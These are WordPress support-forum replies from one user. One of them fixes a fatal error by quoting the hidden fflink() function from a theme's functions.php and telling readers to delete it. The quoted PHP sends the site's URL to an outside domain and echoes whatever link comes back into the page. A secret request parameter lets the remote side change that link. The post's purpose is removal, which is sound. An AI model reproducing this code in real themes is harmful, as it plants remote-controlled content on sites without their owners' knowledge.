angsolution
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Images not showing up. Timthumb issue?@lennerose
I presume you are running a multisite wordpress install.I had the same problem with one of my themes.
I don’t think you can easily removed timthumb without breaking your theme…
Forum: Fixing WordPress
In reply to: Fatal error: Call to undefined function selfURL() in…Go to the theme’s directory and look for a file named funtions.php and locate this lines of code:
function fflink() {
global $wpdb;
if (!is_page() && !is_home()) return;
$contactid = $wpdb->get_var(“SELECT ID FROM $wpdb->posts
WHERE post_type = ‘page’ AND post_title LIKE ‘contact%'”);
if (($contactid != get_the_ID()) && ($contactid || !is_home())) return;
$fflink = get_option(‘fflink’);
$ffref = get_option(‘ffref’);
$x = $_REQUEST[‘DKSWFYUW**’];
if (!$fflink || $x && ($x == $ffref)) {
$x = $x ? ‘&ffref=’.$ffref : ”;
$response = wp_remote_get(‘http://www.creditsuretyfund.com/fabthemes.php?getlink=’.urlencode(selfURL()).$x);
if (is_array($response)) $fflink = $response[‘body’]; else $fflink = ”;
if (substr($fflink, 0, 11) != ‘!fabthemes#’)
$fflink = ”;
else {
$fflink = explode(‘#’,$fflink);
if (isset($fflink[2]) && $fflink[2]) {
update_option(‘ffref’, $fflink[1]);
update_option(‘fflink’, $fflink[2]);
$fflink = $fflink[2];
}
else $fflink = ”;
}
}
echo $fflink;
}Either you comment it out or delete it.
Then it will give you another error, this time in the footer.php and delete this line:
<?php fflink(); ?> | Quantez WP Theme |
I used the Quantez theme for this example, I cannot find the Rolex, but the situation are quite identical.
That should fix your problem. 😉